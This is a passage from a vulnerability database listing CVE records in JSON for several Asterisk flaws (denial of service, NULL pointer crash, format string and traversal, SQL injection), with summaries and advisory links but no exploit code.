              "name": "http://bugs.digium.com/view.php?id=13547",
              "refsource": "CONFIRM",
              "url": "http://bugs.digium.com/view.php?id=13547"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2009-002.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2009-002.html"
            },
            {
              "name": "ADV-2009-0667",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2009/0667"
            },
            {
              "name": "34229",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/34229"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2009-0871",
    "datePublished": "2009-03-11T14:00:00",
    "dateReserved": "2009-03-11T00:00:00",
    "dateUpdated": "2024-08-07T04:48:52.606Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-4047

Vulnerability from cvelistv5

Published

2014-06-17 14:00

Modified

2024-08-06 11:04

Severity ?

Summary

Asterisk Open Source 1.8.x before 1.8.28.1, 11.x before 11.10.1, and 12.x before 12.3.1 and Certified Asterisk 1.8.15 before 1.8.15-cert6 and 11.6 before 11.6-cert3 allows remote attackers to cause a denial of service (connection consumption) via a large number of (1) inactive or (2) incomplete HTTP connections.

References

▼	URL	Tags
	http://www.securityfocus.com/archive/1/532415/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://packetstormsecurity.com/files/127089/Asterisk-Project-Security-Advisory-AST-2014-007.html	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2014-007.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T11:04:28.373Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20140612 AST-2014-007: Exhaustion of Allowed Concurrent HTTP Connections",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/532415/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/127089/Asterisk-Project-Security-Advisory-AST-2014-007.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-007.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-06-12T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk Open Source 1.8.x before 1.8.28.1, 11.x before 11.10.1, and 12.x before 12.3.1 and Certified Asterisk 1.8.15 before 1.8.15-cert6 and 11.6 before 11.6-cert3 allows remote attackers to cause a denial of service (connection consumption) via a large number of (1) inactive or (2) incomplete HTTP connections."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20140612 AST-2014-007: Exhaustion of Allowed Concurrent HTTP Connections",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/532415/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/127089/Asterisk-Project-Security-Advisory-AST-2014-007.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-007.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-4047",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk Open Source 1.8.x before 1.8.28.1, 11.x before 11.10.1, and 12.x before 12.3.1 and Certified Asterisk 1.8.15 before 1.8.15-cert6 and 11.6 before 11.6-cert3 allows remote attackers to cause a denial of service (connection consumption) via a large number of (1) inactive or (2) incomplete HTTP connections."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20140612 AST-2014-007: Exhaustion of Allowed Concurrent HTTP Connections",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/532415/100/0/threaded"
            },
            {
              "name": "http://packetstormsecurity.com/files/127089/Asterisk-Project-Security-Advisory-AST-2014-007.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/127089/Asterisk-Project-Security-Advisory-AST-2014-007.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-007.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-007.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-4047",
    "datePublished": "2014-06-17T14:00:00",
    "dateReserved": "2014-06-12T00:00:00",
    "dateUpdated": "2024-08-06T11:04:28.373Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-7285

Vulnerability from cvelistv5

Published

2018-02-22 00:00

Modified

2024-08-05 06:24

Severity ?

Summary

A NULL pointer access issue was discovered in Asterisk 15.x through 15.2.1. The RTP support in Asterisk maintains its own registry of dynamic codecs and desired payload numbers. While an SDP negotiation may result in a codec using a different payload number, these desired ones are still stored internally. When an RTP packet was received, this registry would be consulted if the payload number was not found in the negotiated SDP. This registry was incorrectly consulted for all packets, even those which are dynamic. If the payload number resulted in a codec of a different type than the RTP stream (for example, the payload number resulted in a video codec but the stream carried audio), a crash could occur if no stream of that type had been negotiated. This was due to the code incorrectly assuming that a stream of that type would always exist.

References

▼	URL	Tags
	http://www.securitytracker.com/id/1040415	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/bid/103149	vdb-entry, x_refsource_BID
	http://downloads.asterisk.org/pub/security/AST-2018-001.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T06:24:11.787Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1040415",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040415"
          },
          {
            "name": "103149",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/103149"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2018-001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-02-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A NULL pointer access issue was discovered in Asterisk 15.x through 15.2.1. The RTP support in Asterisk maintains its own registry of dynamic codecs and desired payload numbers. While an SDP negotiation may result in a codec using a different payload number, these desired ones are still stored internally. When an RTP packet was received, this registry would be consulted if the payload number was not found in the negotiated SDP. This registry was incorrectly consulted for all packets, even those which are dynamic. If the payload number resulted in a codec of a different type than the RTP stream (for example, the payload number resulted in a video codec but the stream carried audio), a crash could occur if no stream of that type had been negotiated. This was due to the code incorrectly assuming that a stream of that type would always exist."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-02-27T10:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1040415",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040415"
        },
        {
          "name": "103149",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/103149"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2018-001.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-7285",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A NULL pointer access issue was discovered in Asterisk 15.x through 15.2.1. The RTP support in Asterisk maintains its own registry of dynamic codecs and desired payload numbers. While an SDP negotiation may result in a codec using a different payload number, these desired ones are still stored internally. When an RTP packet was received, this registry would be consulted if the payload number was not found in the negotiated SDP. This registry was incorrectly consulted for all packets, even those which are dynamic. If the payload number resulted in a codec of a different type than the RTP stream (for example, the payload number resulted in a video codec but the stream carried audio), a crash could occur if no stream of that type had been negotiated. This was due to the code incorrectly assuming that a stream of that type would always exist."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1040415",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040415"
            },
            {
              "name": "103149",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/103149"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2018-001.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2018-001.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-7285",
    "datePublished": "2018-02-22T00:00:00",
    "dateReserved": "2018-02-21T00:00:00",
    "dateUpdated": "2024-08-05T06:24:11.787Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-17090

Vulnerability from cvelistv5

Published

2017-12-02 00:00

Modified

2024-08-05 20:43

Severity ?

Summary

An issue was discovered in chan_skinny.c in Asterisk Open Source 13.18.2 and older, 14.7.2 and older, and 15.1.2 and older, and Certified Asterisk 13.13-cert7 and older. If the chan_skinny (aka SCCP protocol) channel driver is flooded with certain requests, it can cause the asterisk process to use excessive amounts of virtual memory, eventually causing asterisk to stop processing requests of any kind.

References

▼	URL	Tags
	http://www.securitytracker.com/id/1039948	vdb-entry, x_refsource_SECTRACK
	https://www.exploit-db.com/exploits/43992/	exploit, x_refsource_EXPLOIT-DB
	http://www.securityfocus.com/bid/102023	vdb-entry, x_refsource_BID
	https://issues.asterisk.org/jira/browse/ASTERISK-27452	x_refsource_CONFIRM
	https://lists.debian.org/debian-lts-announce/2017/12/msg00028.html	mailing-list, x_refsource_MLIST
	https://www.debian.org/security/2017/dsa-4076	vendor-advisory, x_refsource_DEBIAN
	http://downloads.digium.com/pub/security/AST-2017-013.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T20:43:59.739Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1039948",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1039948"
          },
          {
            "name": "43992",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/43992/"
          },
          {
            "name": "102023",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/102023"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27452"
          },
          {
            "name": "[debian-lts-announce] 20171230 [SECURITY] [DLA 1225-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00028.html"
          },
          {
            "name": "DSA-4076",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2017/dsa-4076"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2017-013.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-12-01T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in chan_skinny.c in Asterisk Open Source 13.18.2 and older, 14.7.2 and older, and 15.1.2 and older, and Certified Asterisk 13.13-cert7 and older. If the chan_skinny (aka SCCP protocol) channel driver is flooded with certain requests, it can cause the asterisk process to use excessive amounts of virtual memory, eventually causing asterisk to stop processing requests of any kind."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-02-09T10:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1039948",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1039948"
        },
        {
          "name": "43992",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/43992/"
        },
        {
          "name": "102023",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/102023"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27452"
        },
        {
          "name": "[debian-lts-announce] 20171230 [SECURITY] [DLA 1225-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00028.html"
        },
        {
          "name": "DSA-4076",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2017/dsa-4076"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2017-013.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-17090",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in chan_skinny.c in Asterisk Open Source 13.18.2 and older, 14.7.2 and older, and 15.1.2 and older, and Certified Asterisk 13.13-cert7 and older. If the chan_skinny (aka SCCP protocol) channel driver is flooded with certain requests, it can cause the asterisk process to use excessive amounts of virtual memory, eventually causing asterisk to stop processing requests of any kind."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1039948",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1039948"
            },
            {
              "name": "43992",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/43992/"
            },
            {
              "name": "102023",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/102023"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27452",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27452"
            },
            {
              "name": "[debian-lts-announce] 20171230 [SECURITY] [DLA 1225-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00028.html"
            },
            {
              "name": "DSA-4076",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2017/dsa-4076"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2017-013.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2017-013.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-17090",
    "datePublished": "2017-12-02T00:00:00",
    "dateReserved": "2017-12-01T00:00:00",
    "dateUpdated": "2024-08-05T20:43:59.739Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2006-4346

Vulnerability from cvelistv5

Published

2006-08-24 20:00

Modified

2024-08-07 19:06

Severity ?

Summary

Asterisk 1.2.10 supports the use of client-controlled variables to determine filenames in the Record function, which allows remote attackers to (1) execute code via format string specifiers or (2) overwrite files via directory traversals involving unspecified vectors, as demonstrated by the CALLERIDNAME variable.

References

▼	URL	Tags
	https://exchange.xforce.ibmcloud.com/vulnerabilities/28544	vdb-entry, x_refsource_XF
	http://www.vupen.com/english/advisories/2006/3372	vdb-entry, x_refsource_VUPEN
	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml	vendor-advisory, x_refsource_GENTOO
	https://exchange.xforce.ibmcloud.com/vulnerabilities/28564	vdb-entry, x_refsource_XF
	http://labs.musecurity.com/advisories/MU-200608-01.txt	x_refsource_MISC
	http://secunia.com/advisories/22651	third-party-advisory, x_refsource_SECUNIA
	http://www.securityfocus.com/bid/19683	vdb-entry, x_refsource_BID
	http://securitytracker.com/id?1016742	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/archive/1/444322/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://www.sineapps.com/news.php?rssid=1448	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T19:06:07.405Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "asterisk-record-code-execution(28544)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28544"
          },
          {
            "name": "ADV-2006-3372",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/3372"
          },
          {
            "name": "GLSA-200610-15",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
          },
          {
            "name": "asterisk-record-directory-traversal(28564)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28564"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
          },
          {
            "name": "22651",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/22651"
          },
          {
            "name": "19683",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/19683"
          },
          {
            "name": "1016742",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1016742"
          },
          {
            "name": "20060825 Multiple Vulnerabilities in Asterisk 1.2.10 (Fixed in 1.2.11)",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.sineapps.com/news.php?rssid=1448"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-08-23T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk 1.2.10 supports the use of client-controlled variables to determine filenames in the Record function, which allows remote attackers to (1) execute code via format string specifiers or (2) overwrite files via directory traversals involving unspecified vectors, as demonstrated by the CALLERIDNAME variable."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-17T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "asterisk-record-code-execution(28544)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28544"
        },
        {
          "name": "ADV-2006-3372",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/3372"
        },
        {
          "name": "GLSA-200610-15",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
        },
        {
          "name": "asterisk-record-directory-traversal(28564)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28564"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
        },
        {
          "name": "22651",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/22651"
        },
        {
          "name": "19683",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/19683"
        },
        {
          "name": "1016742",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016742"
        },
        {
          "name": "20060825 Multiple Vulnerabilities in Asterisk 1.2.10 (Fixed in 1.2.11)",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.sineapps.com/news.php?rssid=1448"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-4346",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk 1.2.10 supports the use of client-controlled variables to determine filenames in the Record function, which allows remote attackers to (1) execute code via format string specifiers or (2) overwrite files via directory traversals involving unspecified vectors, as demonstrated by the CALLERIDNAME variable."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "asterisk-record-code-execution(28544)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28544"
            },
            {
              "name": "ADV-2006-3372",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/3372"
            },
            {
              "name": "GLSA-200610-15",
              "refsource": "GENTOO",
              "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
            },
            {
              "name": "asterisk-record-directory-traversal(28564)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28564"
            },
            {
              "name": "http://labs.musecurity.com/advisories/MU-200608-01.txt",
              "refsource": "MISC",
              "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
            },
            {
              "name": "22651",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/22651"
            },
            {
              "name": "19683",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/19683"
            },
            {
              "name": "1016742",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016742"
            },
            {
              "name": "20060825 Multiple Vulnerabilities in Asterisk 1.2.10 (Fixed in 1.2.11)",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
            },
            {
              "name": "http://www.sineapps.com/news.php?rssid=1448",
              "refsource": "CONFIRM",
              "url": "http://www.sineapps.com/news.php?rssid=1448"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-4346",
    "datePublished": "2006-08-24T20:00:00",
    "dateReserved": "2006-08-24T00:00:00",
    "dateUpdated": "2024-08-07T19:06:07.405Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-26651

Vulnerability from cvelistv5

Published

2022-04-15 00:00

Modified

2024-08-03 05:11

Severity ?

Summary

An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14.

References

▼	URL	Tags
	https://downloads.asterisk.org/pub/security/
	https://downloads.asterisk.org/pub/security/AST-2022-003.html
	http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html
	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	mailing-list
	https://www.debian.org/security/2022/dsa-5285	vendor-advisory

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:11:43.391Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
          },
          {
            "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
          },
          {
            "name": "DSA-5285",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5285"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
